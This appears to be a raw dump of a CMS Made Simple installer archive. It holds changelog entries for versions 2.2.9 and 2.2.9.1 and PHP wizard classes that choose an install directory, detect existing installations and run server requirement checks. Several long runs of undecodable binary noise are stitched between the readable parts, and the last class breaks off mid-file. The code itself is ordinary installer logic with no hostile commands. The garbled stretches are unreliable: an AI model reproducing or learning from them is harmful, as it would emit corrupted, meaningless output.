e��0*��7]�S��#�eN�ӏn3��ʑjDJ5�ֲ�:IGC$�Jh�F�3����w`ڇ��8^��7	P#L��%�`~Pm��6��w���zx���Ǩ����N^;�����@%(l-�U�7T��f���'&oH��\e6v�r�:L@�|�B}�u_����H�mW�**V�r1R���k�n~�F�+O�&K���B����:E�s���sH�l���d9޳Shw�kV�Z�k�!7��p`��ܭ��>�������b3tۓ��6D�����#��hVΊְL�K}�\�z�<����@8
tT\.?������w��"��	VV�>"	l|�C
�@���'�c_ޟ����Z���UQF�]v�Z0]�}�|�Ӻn���E��g[������� =��`�9�FR���'|;�'D��\	R�r{y�)��fI�l��u��Z�k��^)��a�����\��,�w8~�G���%ܬM�	
,,�b�knc���hy+�1Y�������'Version 2.2.9 - Blow Me Down
----------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp()

Search v1.51.6
  - Minor fixes to help

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.
��W�rI}������i,��#�;UYYR{��Ѝ���=�d-��}A'�O�<�L/o>��ݍ>]�\�����Ik|ֹ����ǯ������>��\��X�Oo�\N�/F��w�ǟ�G����}��1���j������7���F��u��I'XG�$�a�F�Ѷ��g&�U�,���8���m��:~|x|
���%	_=)�6���(cv���\��~����)�YԚ}u�\
^�䵗NK����m��zu״O��3If�*;E1����"Zk��ptv��ɷn��xI<y\l�в[v�E�����%��uG1YF�r����h3�aUm5���<��*�
��E�2(a\$k\�R��ģE�:<�m��7}��N9TUi��Q)H�D�B���N$s��]s�NS���!FY����|ͩ�4g�MI� �
�\��V�J!*��N���3:����!��)����[������_��ͪC:i��S���t`b🳓J'!M���͉
8{���L�̂���I�Jtڅ�Pһ��o��>���;ͦ�d8h�YVU��	؈��?LgVm�m�Ȏ�9������0�^�T� ���V�t2NV�Yy�0�+g�%W�1ۨBչT!�������9p���Z$$�^F�X$Z+�@��S��,�3E���*���F�`G�aԯrZhQ8Ee���u^<�n�=�`�O���<໘Pk%��f& �̑ ��~��7q�z���|+�STJF�dE!o��̲��%�B�FP���ȡ�X_��<~���ޒ����f�tt��>�j�YSL6�I���Wϸ�T���v5Z=�:�a��N�+�S�:zU1(�ZD�{�Y���n ͜�HT�*TX��K*E�Z�;��쾤�զ��,��7�~�3��r��@@�m�F;f�9��ܶ��/�����4S��8o�ZBsI����5�Wi���q�z~3i� g�1�z�$�+l'��ޙ�����n>���la��U�D��>,{��n%9��\�#��`_�����b��k.�y�ٔ��雮"{e|`ml��FH�����"�s���+<�=𼬛��1J��`aX�G�]92����6K?�ޑz��u�fw2����S�5��O$b�Ԃ��f�ۀ�u�.f˴�fL�u�?�k�hh ��`-6+H�W[U��`s���*�>��#��*��*� ȹ\q�'q0 ���#���A
�f����"?�L&������������r�p�m��,�\�2�J}�������S늌MRxX�R6�J�>ow����{Ѽ0ܣ��o{HBem���h�֠�16"���|�����Ѐ�%"��6��m>�#�(�-��?q{��s#orG�Q������T��Czh��
�<����U�R�
���Ue�P���맬h���/�����ԄH	���)���]�-�T8��6�۩&�S����Ez�	0"P��G���`���!���Mn[�^�wn'�u���0��Qf��B����f�D;��f��@�st�u;\�U&�A��8
���c0�^!�ժ�����x}�1Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class
  - fix an edge case in the Database\Connection::DbTimeStamp() method

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1
��W�r"�|?_�@�/z�Yi��8H�"��议���v��;i��:’B̍���ʬ����Ϸ��їۻ�o��7W#iMTR9c~�����~:���������q8�yw=��/>ܟ>��������)�nV?��>��������j�T�\
o���%�*�b���rU6�&���_Wy�����ӳ������[��u��I'XG�$�a�F�Ѷ���8�����`���$|�,���8f[��ٕZ�~p���	����Ѵ�Zfi�uՔ��,¸�(����
�WM���MK}�jǩ,�v�q�7�cw�n9�r(F��*(��W5Fa%;��]� +U�)��t��p���Z+�����&O��&�t�$�</6�M�Mh�-���i��%=\��v'1YF�r����h3�gUm5���y�U"�ŋ"%�3.�5.y�����"u^�vq盾Y�FU�A�+F� �5Uj�2:��	�
w�c�Z��e9/�[�5�
�ᬲ)�DY��k��V)DE�?rrv���r���g

�+u��R;�h��
���I�E����t`b🳓J'!M���͉
8����B�̂���I>Jtڅ�Pһ�N����1����R�H����fUu!i���(���Ȧ�O���?c� h.MO���a��*��A<�6�d�����aW.�#K��c�Q�
C�B����D�O���s|�y-�g/#S,�J%P��e��B��y�J�5B6����CS��\�Q�Ub'�W��0�y�o�y�w1��J��L>��3GB���
�q�z���|W2稔��ɊB�F[�N��X�-�h�o>~�����Z���\��-i+A�O��/�l:�CY�D5‚�)&�$���w��V���k�z�u:�6-�CVʧZu�.�"bP&HD�{��FOݠ|t�
3��H�����jhW�6{u	q����M?�����z;��P��9&�'�@�`08�Ǚ�	/��t�x��4�����y��%�K*N^@���_�����E�ݤQ9�.�ђ|��I��Gzg�/��r����r���fV�92�,�aٛ����0�]�`E�z��Fk<F
-.�<�M�u��+�kckv6V��P��,B��+�_�1���e�|�Q�V��>��ȑ1�XKi���=��^��a�'z�i����HT�QR"������6-�\̖i�ogL�u�o��Z44(��`-6+H����T��\,5)�U�C�9�
Z4�'��X� ȹ\q�7q0 ��|Pv�σLΫ�4�섑�Ye0��#���z�i7I�}��/��v���|!��ԣ;>�Q�O?��uE�[�U)l8�AȻ ����m��E��pa/�i�(	����^�+B��U�mD*�-��#N���CD(2���m�%�RͶX�3����?h?�b�����-��b��9���!��=�L�BT6��ʒ�Ȃ��æ��CeE��w���2�ӟ��@���VX����&�[ٌ.-�g�I��@r��ՠ>���#U�|D���
j��ހ�;{�&�-�.�;���~x��$3kl�J�
��(؝L��if���G��C�ᘭ2��a��V�l1Z��� �ժ����v�
�<?php

namespace cms_autoinstaller;

class wizard_step1 extends \cms_autoinstaller\wizard_step
{
    /**
     * @throws \Exception
     */
    public function __construct()
    {
        parent::__construct();
        if( !\class_exists('PharData') )
        {
            throw new \RuntimeException(
              'It appears that the phar extensions have not been enabled in this version of php.  Please correct this.'
            );
        }
    }
    
    /**
     * @throws \__appbase\langtools_Exception
     */
    protected function process()
    {
        if( isset($_POST['lang']) ) {
            $lang = \trim(\__appbase\utils::clean_string($_POST['lang']));
            if( $lang ) \__appbase\translator()->set_selected_language($lang);
        }

        if( isset($_POST['destdir']) ) {
            $app = \__appbase\get_app();
            $app->set_destdir($_POST['destdir']);
        }

        $verbose = 0;
        if( isset($_POST['verbose']) ) $verbose = (int)$_POST['verbose'];
        $this->get_wizard()->set_data('verbose',$verbose);

        if( isset($_POST['next']) ) {
            // redirect to the next step.
            \__appbase\utils::redirect($this->get_wizard()->next_url());
        }
        return TRUE;
    }

    private function get_valid_install_dirs()
    {
        $app = \__appbase\get_app();
        $start = \realpath($app::get_rootdir());
        $parent = \realpath(\dirname($start));

        $_is_valid_dir = function($dir) {
            // this routine attempts to exclude most cmsms core directories
            // from appearing in the dropdown for directory choosers
            $bn = \basename($dir);
            switch( $bn ) {
            case 'lang':
                if( \file_exists("$dir/en_US.php") ) return FALSE;
                break;

            case 'ext':
                if( \file_exists("$dir/fr_FR.php") ) return FALSE;
                break;

            case 'plugins':
                if( \file_exists("$dir/function.cms_selflink.php") ) return FALSE;
                break;

            case 'install':
                if( \is_dir("$dir/schemas") ) return FALSE;
                break;

            case 'tmp':
                if( \is_dir("$dir/cache") ) return FALSE;
                break;

            case 'phar_installer':
            case 'doc':
            case 'build':
            case 'admin':
            case 'module_custom':
            case 'out':
                return FALSE;

            case 'lib':
                if( \is_dir("$dir/smarty") ) return FALSE;
                break;

            case 'app':
                if( \file_exists("$dir/class.cms_install.php") ) return FALSE;
                break;

            case 'modules':
                if(\is_dir("$dir/CMSMailer") || \is_dir("$dir/AdminSearch") ) return FALSE;
                break;

            case 'data':
                if( \file_exists("$dir/data.tar.gz") ) return FALSE;
                break;
            }
            return TRUE;
        };
        
        $_get_annotation = static function($dir) {
            /** @var string $CMS_VERSION from version.php (deprecated) or from lib/version.php */
            if(!\is_dir($dir) || !\is_readable($dir) ) return '';
            $bn = \basename($dir);
            if( $bn != 'lib' && \is_file("$dir/version.php" ) ) {
                @include("$dir/version.php"); // defines in this file can throw notices
  
                if( isset($CMS_VERSION) ) return "CMSMS $CMS_VERSION"; # this should be deprecated in the future
            } else if( \is_file("$dir/lib/version.php") ) {
                @include("$dir/lib/version.php"); // defines in this file can throw notices
                if( isset($CMS_VERSION) ) return "CMSMS $CMS_VERSION";
            }

            if(\is_dir("$dir/app") && \is_file("$dir/app/class.cms_install.php") ) {
                return "CMSMS installation assistant";
            }
        };

        $_find_dirs = static function($start, $depth = 0) use( &$_find_dirs, &$_get_annotation, $_is_valid_dir ) {
            $out = [];
            if( !\is_readable($start ) ) return $out;
            $dh = \opendir($start);
            if( !$dh ) return $out;
            
            while( ($file = readdir($dh)) !== FALSE ) {
                if( $file == '.' || $file == '..' ) continue;
                if( \__appbase\startswith($file,'.') || \__appbase\startswith($file,'_') ) continue;
                $dn = $start.DIRECTORY_SEPARATOR.$file;  // cuz windows blows, and windoze guys are whiners :)
                if( !@\is_readable($dn) ) continue;
                if( !@\is_dir($dn) ) continue;
                if( !$_is_valid_dir( $dn ) ) continue;
                $str = $dn;
                $ann = $_get_annotation( $dn );
                if( $ann ) $str .= " ($ann)";

                $out[$dn] = $str;
                if( $depth < 3 ) {
                    $tmp = $_find_dirs($dn,$depth + 1); // recursion
                    if(\is_array($tmp) && \count($tmp) ) $out = \array_merge($out, $tmp); # revise this to be more efficient (merging arrays in a loop is slow and causes high CPU usage.)
                }
            }
            return $out;
            //if( count($out) ) return $out;
        };

        $out = [];
        if( $_is_valid_dir($parent) ) $out[$parent] = $parent;
        $tmp = $_find_dirs($parent);
        if( \count($tmp) ) $out = \array_merge($out, $tmp);
        \asort($out);
        return $out;
    }

    protected function display()
    {
        parent::display();

        // get the list of directories we can install to.
        $smarty = \__appbase\smarty();
        $app = \__appbase\get_app();
        if( !$app->in_phar() ) {
            // get the list of directories we can install to
            $dirlist = $this->get_valid_install_dirs();
            if( !$dirlist ) throw new \RuntimeException('No possible installation directories found.  This could be a permissions issue');
            $smarty->assign('dirlist',$dirlist);

            $custom_destdir = $app->has_custom_destdir();
            $smarty->assign('custom_destdir',$custom_destdir);
            $smarty->assign('destdir',$app->get_destdir());
        }
        $smarty->assign('verbose',$this->get_wizard()->get_data('verbose',0));
        $smarty->assign('languages',\__appbase\translator()->get_language_list(\__appbase\translator()->get_allowed_languages()));
        $smarty->assign('curlang',\__appbase\translator()->get_current_language());
        $smarty->assign('yesno', [0 =>\__appbase\lang('no'), 1 =>\__appbase\lang('yes')]);
        $smarty->display('wizard_step1.tpl');

        $this->finish();
    }

} // end of class

?>
<?php

namespace cms_autoinstaller;
use \__appbase;

class wizard_step2 extends \cms_autoinstaller\wizard_step
{
    private function get_cmsms_info($dir)
    {
        $info = [];
        if( !$dir ) return;
        if( !\is_dir($dir . '/modules') ) return $info;
        if(!\is_file($dir . '/version.php') && !\is_file("$dir/lib/version.php") ) return $info;
        if(!\is_file($dir . '/include.php') && !\is_file("$dir/lib/include.php") ) return $info;
        if( !\is_file($dir . '/config.php') ) return $info;
        if( !\is_file($dir . '/moduleinterface.php') ) return $info;
        
        # these vars are set by the version.php (deprecated) or /lib/version.php
        /** @var $CMS_VERSION string */
        /** @var $CMS_VERSION_NAME string */
        /** @var $CMS_SCHEMA_VERSION string */

        if( \is_file("$dir/version.php") ) {
            include($dir.'/version.php');
            $info['mtime'] = \filemtime($dir . '/version.php');
        } else {
            include("$dir/lib/version.php");
            $info['mtime'] = \filemtime($dir . '/lib/version.php');
        }
        $info['version']        = $CMS_VERSION;
        $info['version_name']   = $CMS_VERSION_NAME;
        $info['schema_version'] = $CMS_SCHEMA_VERSION;
        $info['config_file']    = $dir . '/config.php';
        
        $app        = \__appbase\get_app();
        $app_config = $app->get_config();
        if( !isset($app_config['min_upgrade_version']) ) throw new \RuntimeException(\__appbase\lang('error_missingconfigvar', 'min_upgrade_version'));
        if(\version_compare($info['version'], $app_config['min_upgrade_version']) < 0 ) $info['error_status'] = 'too_old';
        if(0 == \version_compare($info['version'], $app->get_dest_version())) $info['error_status'] = 'same_ver';
        if( \version_compare($info['version'],$app->get_dest_version()) > 0 ) $info['error_status'] = 'too_new';

        /** @var $config array  set by config.php */
        $fn = $dir.'/config.php';
        include_once($fn);
        $info['config'] = $config;
        if( isset($config['admin_dir']) ) {
            if( $config['admin_dir'] != 'admin' ) throw new \RuntimeException(\__appbase\lang('error_admindirrenamed'));
        }
        return $info;
    }

    protected function process()
    {
        if( isset($_REQUEST['install']) ) {
            $this->get_wizard()->set_data('action','install');
        }
        else if( isset($_REQUEST['upgrade']) ) {
            $this->get_wizard()->set_data('action','upgrade');
        }
        else if( isset($_REQUEST['freshen']) ) {
            $this->get_wizard()->set_data('action','freshen');
        }
        else {
            throw new \Exception(\__appbase\lang('error_internal',200));
        }
        \__appbase\utils::redirect($this->get_wizard()->next_url());
    }
    
    /**
     * @throws \SmartyException
     * @throws \Exception
     */
    protected function display()
    {
        // search for installs of CMSMS.
        parent::display();
        $app = \__appbase\get_app();
        $config = $app->get_config();

        $rpwd = \__appbase\get_app()->get_destdir();
        $info = $this->get_cmsms_info($rpwd);
        $wizard = $this->get_wizard();
        $smarty = \__appbase\smarty();
        $smarty->assign('pwd',$rpwd);
        $smarty->assign('nofiles',$config['nofiles']);

        if( $info ) {
            // its an upgrade
            $wizard->set_data('version_info',$info);
            $smarty->assign('cmsms_info',$info);
            if( !isset($info['error_status']) || $info['error_status'] != 'same_ver' ) {
                $versions = utils::get_upgrade_versions();
                $out = [];
                foreach( $versions as $version ) {
                    if(\version_compare($version, $info['version']) < 1 ) continue;
                    $readme = utils::get_upgrade_readme($version);
                    $changelog = utils::get_upgrade_changelog($version);
                    if( $readme || $changelog ) $out[$version] = ['readme' =>$readme, 'changelog' =>$changelog];
                }
                $smarty->assign('upgrade_info',$out);
            }
        }
        else {
            // looks like a new "install"
            // double check for the phar stuff.
            if(\is_dir($rpwd . '/app') && \is_file($rpwd . '/index.php') && \is_dir($rpwd . '/lib') && \is_file($rpwd . '/app/class.cms_install.php') ) {
                // should never happen except if you're working on this project.
                throw new \RuntimeException(\__appbase\lang('error_invalid_directory'));
            }

            $is_dir_empty = function($dir,$phar_url) {
                if( !$dir ) return FALSE;
                if( !\is_dir($dir) ) return FALSE;
                $files = \glob($dir . '/*');
                if( !\count($files) ) return TRUE;
                if(\count($files) > 3 ) return FALSE;
                // trivial check for index.html
                foreach( $files as $file ) {
                    $bn = \strtolower(\basename($file));
                    if( \fnmatch('index.htm*', $bn) ) continue;   // this is okay
                    if( \fnmatch('readme*.txt', $bn) ) continue;  // this is okay
                    if( $phar_url ) {
                        $phar_bn = \basename($phar_url );
                        if( \fnmatch($phar_bn, $bn ) ) continue; // this is okay
                    }
                    // found a not-okay file.
                    return FALSE;
                }
                return TRUE;
            };
            $list_files = function($dir,$n = 5) {
                $n = \max(1, \min(100, $n));
                if( !$dir ) return [];
                if( !\is_dir($dir) ) return [];
                $files = \glob($dir . '/*');
                $files = \array_slice($files, 0, $n);
                foreach( $files as &$file ) {
                    $file = \basename($file);
                }
                return $files;
            };
            $empty_dir = $is_dir_empty($rpwd,$app->get_phar());
            $existing_files = $list_files($rpwd);
            $smarty->assign('install_empty_dir',$empty_dir);
            $smarty->assign('existing_files',$existing_files);
            $wizard->clear_data('version_info');
        }

        $smarty->assign('retry_url',$_SERVER['REQUEST_URI']);
        $smarty->display('wizard_step2.tpl');
        $this->finish();
    }

} // end of class

?>
<?php

namespace cms_autoinstaller;
use \__appbase\tests as _tests_;

class wizard_step3 extends \cms_autoinstaller\wizard_step
{
    protected function process()
    {
        # nothing here
    }
    
    /**
     * @throws \Exception
     */
    protected function perform_tests($verbose, &$infomsg, &$tests)
    {
        $app = \__appbase\get_app();
        $version_info = $this->get_wizard()->get_data('version_info');
        $action = $this->get_wizard()->get_data('action');
        $informational = [];
        $tests = [];

        // informational messages...
        $informational[] = new _tests_\informational_test('server_software',$_SERVER['SERVER_SOFTWARE'],'info_server_software');
        $informational[] = new _tests_\informational_test('server_api', \PHP_SAPI, 'info_server_api');
        $informational[] = new _tests_\informational_test('server_os', [\PHP_OS, \php_uname('r'), \php_uname('m')]);

        // required test for php version
        $obj = new _tests_\version_range_test('php_version', \PHP_VERSION);
        $obj->minimum = '5.4.11';
        $obj->recommended = '5.5.2';
        $obj->fail_msg = \__appbase\lang('pass_php_version', $obj->minimum, $obj->recommended, \PHP_VERSION);
        $obj->warn_msg = \__appbase\lang('msg_yourvalue', \PHP_VERSION);
        $obj->pass_msg = \__appbase\lang('msg_yourvalue', \PHP_VERSION);
        $obj->required = true;
        $tests[] = $obj;

        // required test... check if most files are writable.
        {
            $dirs = ['modules', 'lib', 'plugins', 'admin', 'uploads', 'doc', 'scripts', 'install', 'tmp', 'assets'];
            $failed = [];
            $list = \glob($app->get_destdir() . '/*');
            foreach( $list as $one ) {
                $basename = \basename($one);
                if( \is_file($one) ) {
                    $relative = \substr($one, \strlen($app->get_destdir()) + 1);
                    if( !\is_writable($one) ) $failed[] = $relative;
                }
                else if( \in_array($basename, $dirs) ) {
                    $b = \__appbase\utils::is_directory_writable($one,TRUE);
                    if( !$b ) {
                        $tmp = \__appbase\utils::get_writable_error();
                        $failed = \array_merge($failed,\__appbase\utils::get_writable_error()); # revise this to be more efficient (merging arrays in a loop is slow and causes high CPU usage.)
                    }
                }
            }
        }

        // required test... tmpfile
        $fh = \tmpfile();
        $b = !((FALSE === $fh));
        $obj = new _tests_\boolean_test('tmpfile',$b);
        $obj->required = TRUE;
        if( !$b ) $obj->fail_msg = \__appbase\lang('fail_tmpfile');
        $tests[] = $obj;
        unset($fh);

        // its an upgrade
        if( $version_info ) {
            // config file must be writable.
            $obj = new _tests_\boolean_test('config_writable', \is_writable($version_info['config_file']));
            $obj->required = TRUE;
            $obj->fail_key = 'fail_config_writable';
            $tests[] = $obj;

            if('upgrade' == $action && \version_compare($version_info['version'], '2.2') < 0 ) {
                $dir = $app->get_destdir().'/assets';
                if( \is_dir($dir) ) {
                    $obj = new _tests_\boolean_test('assets_dir_exists',FALSE);
                    $obj->fail_key = 'fail_assets_dir';
                    $obj->warn_key = 'fail_assets_dir';
                    $obj->required = 0;
                    $tests[] = $obj;
                }
            }
        } else {
            $is_dir_empty = function($dir) {
                $dir = \trim($dir);
                if( !$dir ) return FALSE;         // fail on invalid dir
                if( !\is_dir($dir) ) return TRUE; // pass on dir not existing yet
                $files = \glob($dir . '/*' );
                if( !\count($files) ) return TRUE;    // no files yet.
                if(\count($files) > 1 ) return FALSE; // more than one file
                // trivial check for index.html
                $bn = \strtolower(\basename($files[0]));
                if( \fnmatch('index.htm*', $bn) ) return TRUE;
                return FALSE;
            };
            $res = true;
            $dest = $app->get_destdir();
            if( $res && !$is_dir_empty($dest.'/tmp/cache') ) $res = false;
            if( $res && !$is_dir_empty($dest.'/tmp/templates_c') ) $res = false;

            $obj = new _tests_\boolean_test('tmp_dirs_empty',$res);
            $obj->required = true;
            $obj->fail_key = 'fail_tmp_dirs_empty';
            $tests[] = $obj;
        }

        // required test... gd version 2
        $obj = new _tests_\version_range_test('gd_version',$this->_GDVersion());
        $obj->minimum = 2;
        $obj->required = 1;
        $obj->fail_msg = \__appbase\lang('msg_yourvalue',$this->_GDVersion());
        $tests[] = $obj;

        // required test ... tempnam function
        $obj = new _tests_\boolean_test('func_tempnam', \function_exists('tempnam'));
        $obj->required = 1;
        $obj->fail_key = 'fail_func_tempnam';
        $tests[] = $obj;

        // required test ... some sort of gzopen/gzopen64 combo
        $obj = new _tests_\boolean_test('func_gzopen', \function_exists('gzopen') || \function_exists('gzopen64'));
        $obj->required = true;
        $obj->fail_key = 'fail_func_gzopen';
        $tests[] = $obj;

        // recommended test ... ZipArchive
        $obj = new _tests_\boolean_test('func_ziparchive', \class_exists('ZipArchive'));
        $obj->required = false;
        $obj->fail_key = 'fail_func_ziparchive';
        $tests[] = $obj;
    
        // only perform the check below PHP 7.0 (we'll be removing this check on 2.99+)
        // note: we are way past the PHP 7.0.0 release so we just go ahead with this
//        if(\version_compare(PHP_VERSION, '7.0.0') < 0)
//        {
//          // required test ... magic_quotes_runtime
//          // TODO: remove on 2.99+ if not removed already as it was removed from PHP since v 5.4.0 (JM)
//          $obj = new _tests_\boolean_test('magic_quotes_runtime',function_exists('get_magic_quotes_runtime') && !get_magic_quotes_runtime());
//          $obj->required = 1;
//          $obj->fail_key = 'fail_magic_quotes_runtime';
//          $tests[] = $obj;
//        }
        // required test ... multibyte extension
        $obj = new _tests_\boolean_test('multibyte_support', _tests_\test_extension_loaded('mbstring') && \function_exists('mb_get_info'));
        $obj->required = 1;
        $obj->fail_key = 'fail_multibyte_support';
        $tests[] = $obj;

        // recommended test ... intl extension
        $obj = new _tests_\boolean_test('intl_support', _tests_\test_extension_loaded('intl') && \class_exists('IntlDateFormatter'));
        $obj->required = 0;
        $obj->fail_key = 'fail_intl_support';
        $obj->warn_key = 'fail_intl_support';
        $tests[] = $obj;

        // required test ... at least one supported database driver
        $obj = new _tests_\matchany_test('database_support');
        $obj->required = 1;
        $t1 = new _tests_\boolean_test('mysql',_tests_\test_extension_loaded('mysql'));
        $obj->add_child($t1);
        $t1 = new _tests_\boolean_test('mysqli',_tests_\test_extension_loaded('mysqli'));
        $obj->add_child($t1);
        $obj->fail_key = 'fail_database_support';
        $tests[] = $obj;

        // required test ... md5 function
        $obj = new _tests_\boolean_test('func_md5', \function_exists('md5'));
        $obj->fail_key = 'fail_func_md5';
        $obj->required = 1;
        $tests[] = $obj;

        // required test ... json function
        $obj = new _tests_\boolean_test('func_json', \function_exists('json_decode'));
        $obj->fail_key = 'pass_func_json';
        $obj->required = 1;
        $tests[] = $obj;

        // recommended test ... open basedir
        $obj = new _tests_\boolean_test('open_basedir', '' == \ini_get('open_basedir'));
        $obj->warn_key = 'warn_open_basedir';
        $obj->fail_key = 'fail_open_basedir';
        $tests[] = $obj;

        // required test... sessions must use cookies
        $t0 = new _tests_\boolean_test('session_use_cookies', \ini_get('session.use_cookies'));
        $t0->required = 1;
        $t0->fail_key = 'fail_session_use_cookies';
        $tests[] = $t0;

        if('files' == \ini_get('session.save_handler')) {
            $open_basedir = \ini_get('open_basedir');
            if( $open_basedir ) {
                // open basedir restrictions are in effect, can't test if the session save path is writable
                // so just talk about it.
                // note: if we got here, sessions are probably working just fine.
                $t2 = new _tests_\boolean_test('open_basedir_session_save_path',0);
                $t2->warn_key = 'warn_open_basedir_session_savepath';
                $t2->msg = \__appbase\lang('info_open_basedir_session_save_path');
                $tests[] = $t2;
            }
            else {
                // test if the session save path is writable.
                $tmp = $this->_get_session_save_path();
                if( $tmp ) {
                    // session save path can be empty which should use the system temporary directory
                    $t2 = new _tests_\boolean_test('session_save_path_exists',@\is_dir($tmp));
                    $t2->required = 1;
                    $t2->fail_key = 'fail_session_save_path_exists';
                    $tests[] = $t2;

                    $t3 = new _tests_\boolean_test('session_save_path_writable',@\is_writable($tmp));
                    $t3->required = 1;
                    $t3->fail_key = 'fail_session_save_path_writable';
                    $tests[] = $t3;
                }
            }
        }

        // recommended test ... E_STRICT disabled
        $orig_error_level = $app->get_orig_error_level();
        $obj = new _tests_\boolean_test('errorlevel_estrict',!($orig_error_level & \E_STRICT));
        $obj->warn_key = 'estrict_enabled';
        $tests[] = $obj;

        // recommended test ... E_DEPRECATED disabled
        $obj = new _tests_\boolean_test('errorlevel_edeprecated',!($orig_error_level & \E_DEPRECATED));
        $obj->warn_key = 'edeprecated_enabled';
        $tests[] = $obj;

        // required test ... MEMORY LIMIT
        $memory_limit = \ini_get('memory_limit');
        if( $memory_limit >= 0 ) {
            $obj = new _tests_\range_test('memory_limit',$memory_limit);
            $obj->minimum = '16M';
            $obj->recommended = '32M';
            $obj->pass_msg = \ini_get('memory_limit');
            $obj->fail_msg = \__appbase\lang('fail_memory_limit', \ini_get('memory_limit'), $obj->minimum, $obj->recommended);
            $obj->warn_msg = \__appbase\lang('warn_memory_limit', \ini_get('memory_limit'), $obj->minimum, $obj->recommended);
            $obj->required = 1;
            $tests[] = $obj;
        } else {
            $obj = new _tests_\boolean_test('memory_limit',true);
            $obj->pass_msg = \__appbase\lang('pass_memory_limit_nolimit');
            $obj->required = 1;
            $tests[] = $obj;
        }

        // required test ... safe mode
        $obj = new _tests_\boolean_test('safe_mode',_tests_\test_is_false(\ini_get('safe_mode')));
        $obj->required = 1;
        $obj->fail_key = 'fail_safe_mode';
        $tests[] = $obj;

        // required test ... file upload
        $obj = new _tests_\boolean_test('file_uploads',_tests_\test_is_true(\ini_get('file_uploads')));
        $obj->required = 1;
        $obj->fail_key = 'fail_file_uploads';
        $tests[] = $obj;

        // upload max filesize
        $obj = new _tests_\range_test('upload_max_filesize', \ini_get('upload_max_filesize'));
        $obj->minimum = '1M';
        $obj->recommended = '10M';
        $obj->required = 1;
        $obj->warn_msg = \__appbase\lang('warn_upload_max_filesize', \ini_get('upload_max_filesize'), $obj->recommended);
        $tests[] = $obj;

        // xml extension
        $obj = new _tests_\boolean_test('xml_functions',_tests_\test_extension_loaded('xml'));
        $obj->required = 1;
        $obj->fail_key = 'fail_xml_functions';
        $tests[] = $obj;

        // recommended test ... max_execution_time
        $v = (int) \ini_get('max_execution_time');
        if(0 !== $v) {
            $obj = new _tests_\range_test('max_execution_time',$v);
            $obj->minimum = 30;
            $obj->recommended = 60;
            $obj->required = 1;
            $obj->warn_msg = \__appbase\lang('warn_max_execution_time', \ini_get('max_execution_time'), $obj->minimum, $obj->recommended);;
            $obj->fail_msg = \__appbase\lang('fail_max_execution_time', \ini_get('max_execution_time'), $obj->minimum, $obj->recommended);;
            $tests[] = $obj;
        }

        // recommended test ... post_max_size
        $obj = new _tests_\range_test('post_max_size', \ini_get('post_max_size'));
        $obj->minimum = '2M';
        $obj->recommended = '10M';
        $obj->warn_msg = \__appbase\lang('warn_post_max_size', \ini_get('post_max_size'), $obj->minimum, $obj->recommended);
        $obj->fail_key = 'fail_post_max_size';
        $tests[] = $obj;

        // recommended test (register globals)
        // we are way past php 5.3...
//        $obj = new _tests_\boolean_test('register_globals',!\ini_get('register_globals'));
//        $obj->required = 1;
//        $obj->fail_key = 'fail_register_globals';
//        $tests[] = $obj;

        // recommended test ... output buffering
        $obj = new _tests_\boolean_test('output_buffering', \ini_get('output_buffering'));
        $obj->fail_key = 'fail_output_buffering';
        $tests[] = $obj;

        // recommended test .... disable functions
        $obj = new _tests_\boolean_test('disable_functions', '' == \ini_get('disable_functions'));
        $obj->warn_msg = \__appbase\lang('warn_disable_functions', \str_replace(',', ', ', \ini_get('disable_functions')));
        $tests[] = $obj;

        // recommended test... remote_url
        $obj = new _tests_\boolean_test('remote_url',_tests_\test_remote_file('https://www.cmsmadesimple.org/latest_version.php',3,'cmsmadesimple'));
        $obj->fail_key = 'fail_remote_url';
        $obj->warn_key = 'fail_remote_url';
        $tests[] = $obj;

        // curl extension
        $obj = new _tests_\boolean_test('curl_extension',_tests_\test_extension_loaded('curl'));
        $obj->fail_key = 'fail_curl_extension';
        $tests[] = $obj;

        // file get contents.
        $obj = new _tests_\boolean_test('file_get_contents', \function_exists('file_get_contents'));
        $obj->required = 1;
        $obj->fail_key = 'fail_file_get_contents';
        $tests[] = $obj;

        // test ini set
        # not sure if this works with php 8.0 or above??? revisit (JM)
        {
            $val = (\ini_get('log_errors_max_len')) ? \ini_get('log_errors_max_len') . '0':'99';
            \ini_set('log_errors_max_len', $val);
            $obj = new _tests_\boolean_test('ini_set', \ini_get('log_errors_max_len') == $val);
            $obj->fail_key = 'fail_ini_set';
            $tests[] = $obj;
        }

        //
        // now run the tests
        // if all tests pass
        //   display warm fuzzy message
        //   user can continue
        // else if a required test fails
        //   display failed tests (or all tests for verbose mode)
        //   user cant continue
        // otherwise
        //   display failed tests (or all tests for verbose mode)
        //   user can continue
        $can_continue = TRUE;
        $tests_failed = FALSE;
        $results = [];
        foreach($tests as $iValue)
        {
            $res = $iValue->run();
            if($res == $iValue::TEST_FAIL ) {
                $tests_failed = TRUE;
                $results[] = $iValue;
                if( $iValue->required ) {
                    $can_continue = FALSE;
                }
                else {
                    $iValue->status = $iValue::TEST_WARN;
                }
            }
        }
        if( !$verbose ) $tests = $results;
        
        return [$tests_failed, $can_continue];
    }
    
    /**
